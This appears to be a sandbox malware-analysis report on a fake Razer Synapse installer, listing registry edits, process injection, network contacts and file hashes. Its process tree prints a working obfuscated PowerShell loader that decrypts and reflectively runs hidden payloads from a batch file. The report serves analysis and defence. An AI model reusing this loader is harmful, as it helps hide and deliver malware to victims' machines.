040000000100000010000000a923759bba49366e31c2dbf2e766ba870f000000010000001400000007eeabaf80a9ef4ae1b2cb9b4b5fc70d0428e6a953000000010000004800000030463021060b6086480186fd6d0107170330123010060a2b0601040182373c0101030200c03021060b6086480186fd6e0107170330123010060a2b0601040182373c0101030200c00b000000010000002e00000053007400610072006600690065006c006400200054006500630068006e006f006c006f0067006900650073000000090000000100000016000000301406082b0601050507030406082b06010505070301140000000100000014000000a848b4242fc6ea24a0d78e3cb93c5c78d79833e41d00000001000000100000005959ddbc9c7632ba0a05f06316846fe6030000000100000014000000317a2ad07f2b335ef5a1c34e4b57e8b7d8f1fca619000000010000001000000044ba5fd9039fc9b56fd8aadccd597ca62000000001000000eb020000308202e730820250020101300d06092a864886f70d01010505003081bb312430220603550407131b56616c69436572742056616c69646174696f6e204e6574776f726b31173015060355040a130e56616c69436572742c20496e632e31353033060355040b132c56616c694365727420436c617373203220506f6c6963792056616c69646174696f6e20417574686f726974793121301f06035504031318687474703a2f2f7777772e76616c69636572742e636f6d2f3120301e06092a864886f70d0109011611696e666f4076616c69636572742e636f6d301e170d3939303632363030313935345a170d3139303632363030313935345a3081bb312430220603550407131b56616c69436572742056616c69646174696f6e204e6574776f726b31173015060355040a130e56616c69436572742c20496e632e31353033060355040b132c56616c694365727420436c617373203220506f6c6963792056616c69646174696f6e20417574686f726974793121301f06035504031318687474703a2f2f7777772e76616c69636572742e636f6d2f3120301e06092a864886f70d0109011611696e666f4076616c69636572742e636f6d30819f300d06092a864886f70d010101050003818d0030818902818100ce3a71cae5abc8599255d7abd8740ef9eed9f655475965470e0555dceb98363c5c535dd330cf38ecbd4189ed254209246b0a5eb37cdd522d4ce6d4d67d5a59a965d449132d244d1c506fb5c185543bfe71e4d35c42f980e0911a0a5b393667f33f557c1b3fb45f647334e3b412bf8764f8da12ff3727c1b343bbef7b6e2e69f70203010001300d06092a864886f70d0101050500038181003b7f506f6f509499496238381f4bf8a5c83ea78281f62bc7e8c5cee83a1082cb18008e4dbda8587fa17900b5bbe98daf41d90f34ee218119a0324928f4c48e56d55233fd50d57e996c03e4c94cfccb6cab66b34a218ce5b50c323e10b2cc6ca1dc9a984c025bf3ceb99ea5720e4ab73f3ce61668f8beed744cbc5bd5621f43dd C:\Windows\Installer\Razer\Installer\App\RazerInstaller.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\AD7E1C28B064EF8F6003402014C3D0E3370EB58A C:\Windows\Installer\Razer\Installer\App\RazerInstaller.exe N/A
Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\AD7E1C28B064EF8F6003402014C3D0E3370EB58A\Blob = 0f00000001000000140000000f6aad4c3fe04619cdc8b2bd655aa1a26042e6500b000000010000005400000053007400610072006600690065006c006400200043006c00610073007300200032002000430065007200740069006600690063006100740069006f006e00200041007500740068006f007200690074007900000053000000010000004800000030463021060b6086480186fd6d0107170330123010060a2b0601040182373c0101030200c03021060b6086480186fd6e0107170330123010060a2b0601040182373c0101030200c009000000010000002a000000302806082b0601050507030106082b0601050507030206082b0601050507030406082b06010505070303140000000100000014000000bf5fb7d1cedd1f86f45b55acdcd710c20ea988e71d000000010000001000000090c4f4233b006b7bfaa6adcd8f577d77030000000100000014000000ad7e1c28b064ef8f6003402014c3d0e3370eb58a2000000001000000130400003082040f308202f7a003020102020100300d06092a864886f70d01010505003068310b300906035504061302555331253023060355040a131c537461726669656c6420546563686e6f6c6f676965732c20496e632e31323030060355040b1329537461726669656c6420436c61737320322043657274696669636174696f6e20417574686f72697479301e170d3034303632393137333931365a170d3334303632393137333931365a3068310b300906035504061302555331253023060355040a131c537461726669656c6420546563686e6f6c6f676965732c20496e632e31323030060355040b1329537461726669656c6420436c61737320322043657274696669636174696f6e20417574686f7269747930820120300d06092a864886f70d01010105000382010d00308201080282010100b732c8fee971a60485ad0c1164dfce4defc80318873fa1abfb3ca69ff0c3a1dad4d86e2b5390fb24a43e84f09ee85fece52744f528a63f7bdee02af0c8af532f9eca0501931e8f661c39a74dfa5ab673042566eb777fe759c64a99251454eb26c7f37f19d530708fafb0462affadeb29edd79faa0487a3d4f989a5345fdb43918236d9663cb1b8b982fd9c3a3e10c83bef0665667a9b19183dff71513c302e5fbe3d7773b25d066cc323569a2b8526921ca702b3e43f0daf087982b8363dea9cd335b3bc69caf5cc9de8fd648d1780336e5e4a5d99c91e87b49d1ac0d56e1335235edf9b5f3defd6f776c2ea3ebb780d1c42676b04d8f8d6da6f8bf244a001ab020103a381c53081c2301d0603551d0e04160414bf5fb7d1cedd1f86f45b55acdcd710c20ea988e73081920603551d2304818a3081878014bf5fb7d1cedd1f86f45b55acdcd710c20ea988e7a16ca46a3068310b300906035504061302555331253023060355040a131c537461726669656c6420546563686e6f6c6f676965732c20496e632e31323030060355040b1329537461726669656c6420436c61737320322043657274696669636174696f6e20417574686f72697479820100300c0603551d13040530030101ff300d06092a864886f70d01010505000382010100059d3f889dd1c91a55a1ac69f3f359da9b01871a4f57a9a179092adbf72fb21eccc75e6ad88387a197ef49353e7706415862bf8e58b80a673fecb3dd21661fc954fa72cc3d4c40d881af779e837abba2c7f534178ed91140f4fc2c2a4d157fa7625d2e25d3000b201a1d68f917b8f4bd8bed2859dd4d168b1783c8b265c72d7aa5aabc53866ddd57a4caf820410b68f0f4fb74be565d7a79f5f91d85e32d95bef5719043cc8d1f9a000a8729e95522580023eae31243295b4708dd8c416a6506a8e521aa41b4952195b97dd134ab13d6adbcdce23d39cdbd3e7570a1185903c922b48f9cd55e2ad7a5b6d40a6df8b74011469a1f790e62bf0f97ece02f1f1794 C:\Windows\Installer\Razer\Installer\App\RazerInstaller.exe N/A
Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\AD7E1C28B064EF8F6003402014C3D0E3370EB58A\Blob = 190000000100000010000000fd960962ac6938e0d4b0769aa1a64e26030000000100000014000000ad7e1c28b064ef8f6003402014c3d0e3370eb58a1d000000010000001000000090c4f4233b006b7bfaa6adcd8f577d77140000000100000014000000bf5fb7d1cedd1f86f45b55acdcd710c20ea988e709000000010000002a000000302806082b0601050507030106082b0601050507030206082b0601050507030406082b0601050507030353000000010000004800000030463021060b6086480186fd6d0107170330123010060a2b0601040182373c0101030200c03021060b6086480186fd6e0107170330123010060a2b0601040182373c0101030200c00b000000010000005400000053007400610072006600690065006c006400200043006c00610073007300200032002000430065007200740069006600690063006100740069006f006e00200041007500740068006f00720069007400790000000f00000001000000140000000f6aad4c3fe04619cdc8b2bd655aa1a26042e6502000000001000000130400003082040f308202f7a003020102020100300d06092a864886f70d01010505003068310b300906035504061302555331253023060355040a131c537461726669656c6420546563686e6f6c6f676965732c20496e632e31323030060355040b1329537461726669656c6420436c61737320322043657274696669636174696f6e20417574686f72697479301e170d3034303632393137333931365a170d3334303632393137333931365a3068310b300906035504061302555331253023060355040a131c537461726669656c6420546563686e6f6c6f676965732c20496e632e31323030060355040b1329537461726669656c6420436c61737320322043657274696669636174696f6e20417574686f7269747930820120300d06092a864886f70d01010105000382010d00308201080282010100b732c8fee971a60485ad0c1164dfce4defc80318873fa1abfb3ca69ff0c3a1dad4d86e2b5390fb24a43e84f09ee85fece52744f528a63f7bdee02af0c8af532f9eca0501931e8f661c39a74dfa5ab673042566eb777fe759c64a99251454eb26c7f37f19d530708fafb0462affadeb29edd79faa0487a3d4f989a5345fdb43918236d9663cb1b8b982fd9c3a3e10c83bef0665667a9b19183dff71513c302e5fbe3d7773b25d066cc323569a2b8526921ca702b3e43f0daf087982b8363dea9cd335b3bc69caf5cc9de8fd648d1780336e5e4a5d99c91e87b49d1ac0d56e1335235edf9b5f3defd6f776c2ea3ebb780d1c42676b04d8f8d6da6f8bf244a001ab020103a381c53081c2301d0603551d0e04160414bf5fb7d1cedd1f86f45b55acdcd710c20ea988e73081920603551d2304818a3081878014bf5fb7d1cedd1f86f45b55acdcd710c20ea988e7a16ca46a3068310b300906035504061302555331253023060355040a131c537461726669656c6420546563686e6f6c6f676965732c20496e632e31323030060355040b1329537461726669656c6420436c61737320322043657274696669636174696f6e20417574686f72697479820100300c0603551d13040530030101ff300d06092a864886f70d01010505000382010100059d3f889dd1c91a55a1ac69f3f359da9b01871a4f57a9a179092adbf72fb21eccc75e6ad88387a197ef49353e7706415862bf8e58b80a673fecb3dd21661fc954fa72cc3d4c40d881af779e837abba2c7f534178ed91140f4fc2c2a4d157fa7625d2e25d3000b201a1d68f917b8f4bd8bed2859dd4d168b1783c8b265c72d7aa5aabc53866ddd57a4caf820410b68f0f4fb74be565d7a79f5f91d85e32d95bef5719043cc8d1f9a000a8729e95522580023eae31243295b4708dd8c416a6506a8e521aa41b4952195b97dd134ab13d6adbcdce23d39cdbd3e7570a1185903c922b48f9cd55e2ad7a5b6d40a6df8b74011469a1f790e62bf0f97ece02f1f1794 C:\Windows\Installer\Razer\Installer\App\RazerInstaller.exe N/A
Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D4DE20D05E66FC53FE1A50882C78DB2852CAE474\Blob = 19000000010000001000000068cb42b035ea773e52ef50ecf50ec529030000000100000014000000d4de20d05e66fc53fe1a50882c78db2852cae47409000000010000000c000000300a06082b060105050703011d0000000100000010000000918ad43a9475f78bb5243de886d8103c140000000100000014000000e59d5930824758ccacfa085436867b3ab5044df053000000010000002400000030223020060a2b06010401b13e01640130123010060a2b0601040182373c0101030200c00b0000000100000034000000420061006c00740069006d006f007200650020004300790062006500720054007200750073007400200052006f006f00740000000f0000000100000014000000ce0e658aa3e847e467a147b3049191093d055e6f20000000010000007b030000308203773082025fa0030201020204020000b9300d06092a864886f70d0101050500305a310b300906035504061302494531123010060355040a130942616c74696d6f726531133011060355040b130a43796265725472757374312230200603550403131942616c74696d6f7265204379626572547275737420526f6f74301e170d3030303531323138343630305a170d3235303531323233353930305a305a310b300906035504061302494531123010060355040a130942616c74696d6f726531133011060355040b130a43796265725472757374312230200603550403131942616c74696d6f7265204379626572547275737420526f6f7430820122300d06092a864886f70d01010105000382010f003082010a0282010100a304bb22ab983d57e826729ab579d429e2e1e89580b1b0e35b8e2b299a64dfa15dedb009056ddb282ece62a262feb488da12eb38eb219dc0412b01527b8877d31c8fc7bab988b56a09e773e81140a7d1ccca628d2de58f0ba650d2a850c328eaf5ab25878a9a961ca967b83f0cd5f7f952132fc21bd57070f08fc012ca06cb9ae1d9ca337a77d6f8ecb9f16844424813d2c0c2a4ae5e60feb6a605fcb4dd075902d459189863f5a563e0900c7d5db2067af385eaebd403ae5e843e5fff15ed69bcf939367275cf77524df3c9902cb93de5c923533f1f2498215c079929bdc63aece76e863a6b97746333bd681831f0788d76bffc9e8e5d2a86a74d90dc271a390203010001a3453043301d0603551d0e04160414e59d5930824758ccacfa085436867b3ab5044df030120603551d130101ff040830060101ff020103300e0603551d0f0101ff040403020106300d06092a864886f70d01010505000382010100850c5d8ee46f51684205a0ddbb4f27258403bdf764fd2dd730e3a41017ebda2929b6793f76f6191323b8100af958a4d46170bd04616a128a17d50abdc5bc307cd6e90c258d86404feccca37e38c637114feddd68318e4cd2b30174eebe755e07481a7f70ff165c84c07985b805fd7fbe6511a30fc002b4f852373904d5a9317a18bfa02af41299f7a34582e33c5ef59d9eb5c89e7c2ec8a49e4e08144b6dfd706d6b1a63bd64e61fb7cef0f29f2ebb1bb7f250887392c2e2e3168d9a3202ab8e18dde91011ee7e35ab90af3e30947ad0333da7650ff5fc8e9e62cf47442c015dbb1db532d247d2382ed0fe81dc326a1eb5ee3cd5fce7811d19c32442ea6339a9 C:\Windows\Installer\Razer\Installer\App\RazerInstaller.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Windows\Installer\Razer\Installer\RazerInstaller.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\Installer\Razer\Installer\RazerInstaller.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\Installer\Razer\Installer\App\RazerInstaller.exe N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Windows\Installer\Razer\Installer\App\RazerInstaller.exe N/A
N/A N/A C:\Windows\Installer\Razer\Installer\App\RazerInstaller.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 1844 wrote to memory of 1924 N/A C:\Users\Admin\AppData\Local\Temp\RazerSynapseInstaller_v1.17.0.60.exe C:\Users\Admin\AppData\Roaming\RazerSynapseInstaller_V1.17.0.600.exe
PID 1844 wrote to memory of 1924 N/A C:\Users\Admin\AppData\Local\Temp\RazerSynapseInstaller_v1.17.0.60.exe C:\Users\Admin\AppData\Roaming\RazerSynapseInstaller_V1.17.0.600.exe
PID 1844 wrote to memory of 1924 N/A C:\Users\Admin\AppData\Local\Temp\RazerSynapseInstaller_v1.17.0.60.exe C:\Users\Admin\AppData\Roaming\RazerSynapseInstaller_V1.17.0.600.exe
PID 1844 wrote to memory of 1924 N/A C:\Users\Admin\AppData\Local\Temp\RazerSynapseInstaller_v1.17.0.60.exe C:\Users\Admin\AppData\Roaming\RazerSynapseInstaller_V1.17.0.600.exe
PID 1844 wrote to memory of 1924 N/A C:\Users\Admin\AppData\Local\Temp\RazerSynapseInstaller_v1.17.0.60.exe C:\Users\Admin\AppData\Roaming\RazerSynapseInstaller_V1.17.0.600.exe
PID 1844 wrote to memory of 1924 N/A C:\Users\Admin\AppData\Local\Temp\RazerSynapseInstaller_v1.17.0.60.exe C:\Users\Admin\AppData\Roaming\RazerSynapseInstaller_V1.17.0.600.exe
PID 1844 wrote to memory of 1924 N/A C:\Users\Admin\AppData\Local\Temp\RazerSynapseInstaller_v1.17.0.60.exe C:\Users\Admin\AppData\Roaming\RazerSynapseInstaller_V1.17.0.600.exe
PID 1844 wrote to memory of 2544 N/A C:\Users\Admin\AppData\Local\Temp\RazerSynapseInstaller_v1.17.0.60.exe C:\Windows\system32\cmd.exe
PID 1844 wrote to memory of 2544 N/A C:\Users\Admin\AppData\Local\Temp\RazerSynapseInstaller_v1.17.0.60.exe C:\Windows\system32\cmd.exe
PID 1844 wrote to memory of 2544 N/A C:\Users\Admin\AppData\Local\Temp\RazerSynapseInstaller_v1.17.0.60.exe C:\Windows\system32\cmd.exe
PID 1924 wrote to memory of 2296 N/A C:\Users\Admin\AppData\Roaming\RazerSynapseInstaller_V1.17.0.600.exe C:\Windows\Installer\Razer\Installer\RazerInstaller.exe
PID 1924 wrote to memory of 2296 N/A C:\Users\Admin\AppData\Roaming\RazerSynapseInstaller_V1.17.0.600.exe C:\Windows\Installer\Razer\Installer\RazerInstaller.exe
PID 1924 wrote to memory of 2296 N/A C:\Users\Admin\AppData\Roaming\RazerSynapseInstaller_V1.17.0.600.exe C:\Windows\Installer\Razer\Installer\RazerInstaller.exe
PID 1924 wrote to memory of 2296 N/A C:\Users\Admin\AppData\Roaming\RazerSynapseInstaller_V1.17.0.600.exe C:\Windows\Installer\Razer\Installer\RazerInstaller.exe
PID 2544 wrote to memory of 1664 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\cmd.exe
PID 2544 wrote to memory of 1664 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\cmd.exe
PID 2544 wrote to memory of 1664 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\cmd.exe
PID 2544 wrote to memory of 2688 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2544 wrote to memory of 2688 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2544 wrote to memory of 2688 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2296 wrote to memory of 320 N/A C:\Windows\Installer\Razer\Installer\RazerInstaller.exe C:\Windows\Installer\Razer\Installer\App\RazerInstaller.exe
PID 2296 wrote to memory of 320 N/A C:\Windows\Installer\Razer\Installer\RazerInstaller.exe C:\Windows\Installer\Razer\Installer\App\RazerInstaller.exe
PID 2296 wrote to memory of 320 N/A C:\Windows\Installer\Razer\Installer\RazerInstaller.exe C:\Windows\Installer\Razer\Installer\App\RazerInstaller.exe
PID 2296 wrote to memory of 320 N/A C:\Windows\Installer\Razer\Installer\RazerInstaller.exe C:\Windows\Installer\Razer\Installer\App\RazerInstaller.exe
PID 2296 wrote to memory of 320 N/A C:\Windows\Installer\Razer\Installer\RazerInstaller.exe C:\Windows\Installer\Razer\Installer\App\RazerInstaller.exe
PID 2296 wrote to memory of 320 N/A C:\Windows\Installer\Razer\Installer\RazerInstaller.exe C:\Windows\Installer\Razer\Installer\App\RazerInstaller.exe
PID 2296 wrote to memory of 320 N/A C:\Windows\Installer\Razer\Installer\RazerInstaller.exe C:\Windows\Installer\Razer\Installer\App\RazerInstaller.exe

Processes

C:\Users\Admin\AppData\Local\Temp\RazerSynapseInstaller_v1.17.0.60.exe

"C:\Users\Admin\AppData\Local\Temp\RazerSynapseInstaller_v1.17.0.60.exe"

C:\Users\Admin\AppData\Roaming\RazerSynapseInstaller_V1.17.0.600.exe

"C:\Users\Admin\AppData\Roaming\RazerSynapseInstaller_V1.17.0.600.exe"

C:\Windows\system32\cmd.exe

cmd /c ""C:\Users\Admin\AppData\Roaming\portforwoder.bat" "

C:\Windows\Installer\Razer\Installer\RazerInstaller.exe

C:\Windows\Installer\Razer\Installer\RazerInstaller.exe

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /S /D /c" echo function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('NZA7uStBimzhU2pjm6inNDqFkCs0FhB+CeLL79sWRI4='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('6OswDjQA8VBkciMxnDy1mg=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $pIVYA=New-Object System.IO.MemoryStream(,$param_var); $kljBV=New-Object System.IO.MemoryStream; $Cddeu=New-Object System.IO.Compression.GZipStream($pIVYA, [IO.Compression.CompressionMode]::Decompress); $Cddeu.CopyTo($kljBV); $Cddeu.Dispose(); $pIVYA.Dispose(); $kljBV.Dispose(); $kljBV.ToArray();}function execute_function($param_var,$param2_var){ $uzlSo=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $uoqGL=$uzlSo.EntryPoint; $uoqGL.Invoke($null, $param2_var);}$swHsV = 'C:\Users\Admin\AppData\Roaming\portforwoder.bat';$host.UI.RawUI.WindowTitle = $swHsV;$PZzIj=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')($swHsV).Split([Environment]::NewLine);foreach ($hSmwK in $PZzIj) { if ($hSmwK.StartsWith('SnmHeIeicRORhReMwpKo')) { $LpkSF=$hSmwK.Substring(20); break; }}$payloads_var=[string[]]$LpkSF.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0].Replace('#', '/').Replace('@', 'A'))));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1].Replace('#', '/').Replace('@', 'A'))));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] ('')); "

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w hidden

C:\Windows\Installer\Razer\Installer\App\RazerInstaller.exe

"C:\Windows\Installer\Razer\Installer\App\RazerInstaller.exe"

Network

Country Destination Domain Proto
US 8.8.8.8:53 u05srooyhc.execute-api.us-east-1.amazonaws.com udp
US 8.8.8.8:53 discovery.razerapi.com udp
DE 99.86.4.106:443 u05srooyhc.execute-api.us-east-1.amazonaws.com tcp
SE 184.31.15.64:443 discovery.razerapi.com tcp
US 8.8.8.8:53 synapse-3-webservice.razerzone.com udp
SE 184.31.15.57:443 synapse-3-webservice.razerzone.com tcp
US 8.8.8.8:53 manifest.razerapi.com udp
SE 184.31.15.122:443 manifest.razerapi.com tcp
US 8.8.8.8:53 cdn.razersynapse.com udp
US 172.64.153.135:443 cdn.razersynapse.com tcp
US 8.8.8.8:53 assets.razerzone.com udp
SE 184.31.15.34:443 assets.razerzone.com tcp
US 8.8.8.8:53 assets2.razerzone.com udp
SE 184.31.15.115:443 assets2.razerzone.com tcp
US 8.8.8.8:53 deals-assets-cdn.razerzone.com udp
SE 184.31.15.98:443 deals-assets-cdn.razerzone.com tcp
SE 184.31.15.34:443 assets.razerzone.com tcp
SE 184.31.15.115:80 assets2.razerzone.com tcp
SE 184.31.15.115:80 assets2.razerzone.com tcp
SE 184.31.15.115:443 assets2.razerzone.com tcp

Files

memory/1844-0-0x000007FEF5B13000-0x000007FEF5B14000-memory.dmp

memory/1844-1-0x0000000000150000-0x00000000009D2000-memory.dmp

C:\Users\Admin\AppData\Roaming\RazerSynapseInstaller_V1.17.0.600.exe

MD5 c6d466e545d5d9732b18ffbd541662e4
SHA1 916683e76e6e59409153b37ba865e4cd0d7fe4bf
SHA256 f051896ab2043d06236e047efd6a2a719a399bb99fc810e5a671412f0ec35dea
SHA512 cfc6296ed0a334983ae28f8d1a94be840ce2afb776ed1a339bd60a65d34a2e99af7d3413b134f64ca40c05f693051ed4eabe12d31313026d64c458921ed1f67f

C:\Users\Admin\AppData\Roaming\portforwoder.bat

MD5 1ea03fad3259b7e127f5e05879db00a9
SHA1 5a0a28fa51768019339626fc0d10777e0860c4cb
SHA256 3a1da018b43f1dd10eb3675d7b636bd32cb0df9e652a14e243f88953f04c8e89
SHA512 c0c58b8bf5711a59bcb8bc34ee328b217f958f77307650ec3084d3c170fb1e7aab42cd4a6e996e53261a630d79ffb5e354ca6f109764e5a6ff805ea1e0a78777

\Windows\Installer\Razer\Installer\RazerInstaller.exe

MD5 87e4fc95fbe145e7574cca7c64b0ce0a
SHA1 c25cb07176c3b3f7088dbbfb4b5439a296295b88
SHA256 514826f28c1bd194f65b742cbe3bbe52c0f163bb1a55da80a25639d4e4b6d2ab
SHA512 0c3f7435385eb9cdb9493bb3981df187ef2878d0e6ed9dde9005a88772f88d121de802805ef4c9623686ecfb8a03ceed45ae05b529fb287ce90097869fc2babe

memory/2296-21-0x0000000000E80000-0x0000000000F36000-memory.dmp

memory/2296-22-0x0000000000DF0000-0x0000000000E66000-memory.dmp

C:\Windows\Installer\Razer\Installer\App\api-ms-win-core-console-l1-1-0.dll

MD5 11e55839fcb3a53bdfed2a27fb7d5e80
SHA1 e585a1ed88696cd310c12f91ffa27f17f354b4f4
SHA256 f6bdc8ffd172b44f4d169707d9a457aeef619872661229b8629ee4f15eefff0d
SHA512 bec9419e35de03cc145b3c974833f73f1a5082d886de4739351b93bb4cc6c0234efd0e35ad845faba83fa600c4a7d5343eaae949a837d00d5528e6db79438ee4

C:\Windows\Installer\Razer\Installer\App\api-ms-win-core-debug-l1-1-0.dll

MD5 64978e199a7239d2c911876447a7f05b
SHA1 0048ce6724db08c64441ce6e573676bc8ae94bf9
SHA256 92b947f1d6236f86ed7e105cff19e23c13d1968861426511b775905e1d26b47a
SHA512 9c64211895473ffc7162b56b0b8e732dec54cf03ea9b9b36fe3cc3339c35fc71fc7173d4e146989db399cb1bcb063079378bb6f778f7d2591cd545550038397c

C:\Windows\Installer\Razer\Installer\App\api-ms-win-core-file-l1-2-0.dll

MD5 ec4f2cb68dcf7e96516eb284003be8bb
SHA1 fb9237719b5e21b9db176e41bdf125e6e7c01b11
SHA256 3816bbb7dd76d8fc6a7b83a0ed2f61b23dd5fc0843d3308ee077cb725d5c9088
SHA512 6cbda80c476a9fcf46458cac45229c96dc9df251230531e25088e834cd954db9ff4561e744f76495f9c57a4068b7635c72c6f9ff838436c54142297ee310b236

C:\Windows\Installer\Razer\Installer\App\api-ms-win-core-heap-l1-1-0.dll

MD5 ee5c2fb7bc23bfd06ff32556cc7c3b4d
SHA1 5d60ebf016219bbec340d353a4fa541fff596d3f
SHA256 efc9f0e32bce971900ddf66a1a9e68daa3bfb2099a1ba9f24c6ee82da2cbd6e8
SHA512 5d1b8a130c27d8eb63ca0c836bdf63e76afb311de26ed4f25b073bda843ebfa25e136849e3882822257e3783058f30af818a96764d60821a40329cff4e1badac

C:\Windows\Installer\Razer\Installer\App\api-ms-win-core-localization-l1-2-0.dll

MD5 dbb81fcc74c59490008ee59bffff5a6d
SHA1 edbb465ab3bea3a4df3f05e5a4e816edbe195c3b
SHA256 f33e6ac5d3e1c4f1d89564fb6aeeac170486c073b67694380755049dbc48eec1
SHA512 2847a73e952bd5f2448264e0bfc8dc1dcd37f8b02d6d6f525ef0cb69c8e634fdcc4637876361b22c53244659039ed305c015435834b61eea15015fed45e9c374

C:\Windows\Installer\Razer\Installer\App\api-ms-win-core-namedpipe-l1-1-0.dll

MD5 1557093add722d1c5a97c359bfcd0d77
SHA1 a8ce995f00a12a81a13d3ef47ce0834178ed69a4
SHA256 3a20635a223e68418c22858413e8c603aac25723de1cb0f54dd675349ec3213d
SHA512 b7acd6882b4d36b52f1e49e4b61ddd025de8503f765b72c94ec5a0d85b6ced513c348f7c4898675728c851a2632ad71c78937cdec9dff994b7b27ed2d85cdddd

C:\Windows\Installer\Razer\Installer\App\api-ms-win-core-processthreads-l1-1-1.dll

MD5 f61b9ecb79cd20fc2e8fce87286cfe43
SHA1 7a48accbe43e156f886f1f2836f74e1043feec59
SHA256 bfa24f94ba095174b82d3657f8ecc689eab8ff380c69b1c9a7e311eb70d66386
SHA512 42ab62087bbc9fc9c9003ae96ebb9e9bbfa3db4eb74bd6746da035d53d1002015d8482ecb92620ec65c42b8b2b41d9b0a7793e105b0cf8cb6f713a2bc03241db

C:\Windows\Installer\Razer\Installer\App\api-ms-win-core-string-l1-1-0.dll

MD5 e57ec98e69961e45cc7a4e0666d26b7d
SHA1 70462a1d68bf49908fcb7186743a47a1affc5d7d
SHA256 52c9b061c4c74eeb70019edde2b690c7e9d9744979a3b718d6687b3a83f00def
SHA512 4a450bcbce0eb3f98f78af07673227a55cdf8e7840fa892196cbb8d0f90551b32731f70f171644f8097fda97d57caa4b7430023671b19881764613231a20cdc9

C:\Windows\Installer\Razer\Installer\App\api-ms-win-core-timezone-l1-1-0.dll

MD5 00b548bf3eab7a6debce296ee5e877de
SHA1 ae18022eb78c192ac3baee32664b9eb011194772
SHA256 d592b91a087c001f9ea38dc5912a90c78fad3a368879d04fd7e5650ed374c8dc
SHA512 3ba15d9a0f1680c2b182cf04fbbfcb0d4f1b607519c161c590928930ad1b3eba8bd417575a51305b9552f0abf0064c74267336ec09cea709aed9228e4eac799e

C:\Windows\Installer\Razer\Installer\App\api-ms-win-crt-convert-l1-1-0.dll

MD5 94e386a317faa200aa1dc270ce54e5fd
SHA1 e352ced285c04378bc3f6af4b30fa69df70b8974
SHA256 e4ccd13d5861e3e28984fc7263d79b580a0bc7bbe0d234ed8f1a69706ef908f3
SHA512 f622d303adecdce6ff88acc779d108556c2fdbe1f4140092d2d637c2fc1aaf651c1798291239e1334aabea702d7d380150922abd4e0122cbfc9c079a64dc0e76

C:\Windows\Installer\Razer\Installer\App\api-ms-win-crt-filesystem-l1-1-0.dll

MD5 42153324a982f848d7a49bb7406125c2
SHA1 f0878690d23ad0c905f0a6ec37e9ea1edb813195
SHA256 fcd8b213e2e9962b84d1eec4296bbefdf4465398a235e118be12c878fdc08c05
SHA512 1710b3fd90210dd6603f2104de249704cad9d83acdc0c6b96ac24e20c4913679b1e4ee41bb7812d919ba76cadb36f7bd8210ee127325fd9db6b542cf2d0b7f69

C:\Windows\Installer\Razer\Installer\App\api-ms-win-crt-math-l1-1-0.dll

MD5 1028042a84aefe816280f22a4517dc68
SHA1 b3437beb0e5a6a062678a0b32cea98f3c5e33580
SHA256 4a88f73cae12080b9a637f76f8ab1b8ac29829817ff03ddd611a25b6981ee573
SHA512 1da4a2d152943447950ae5de80360741c8a827647d1568c18b026376645f15cc9b5d1915dbdb43278adeac1423b20d6e1c97f6ad67ce724a0d91ec84c4e5250c

C:\Windows\Installer\Razer\Installer\App\api-ms-win-crt-process-l1-1-0.dll

MD5 4aa747ecc612240d522c23b51a8be7c1
SHA1 b037be0bc321e9329c7cf0dbf609fdb9b2d82fb4
SHA256 ecc116471ccfa09c599d389d71a574ebed01260b9760021a40665c4d8a22257d
SHA512 fb8c0d4f661fe6c8ce6cd04a3c0661a2f0b6058223edbfea811891aedd343d006c22a8524bf8508c2cc396853252477d5cf3c520889650a24d661f4964bce5c9

C:\Windows\Installer\Razer\Installer\App\api-ms-win-crt-utility-l1-1-0.dll

MD5 e0aeba2d9d9ae584d6c1aa0f5929526b
SHA1 3f97b977d8877398d350b373fd441867167bd2ba
SHA256 4eca5b9e5be5750b0bc03fd74b6d5e351cb6d70fd63d5f740a1a122f906390e0
SHA512 cfa02a7afa052c5149a741500063f110462d272af417c33bedeac6ad3af424b181144c8045adc04a44a54dffca4639ae3c135f23d64bcfb66f7d3aa980143799

C:\Windows\Installer\Razer\Installer\App\AWSSDK.Core.dll

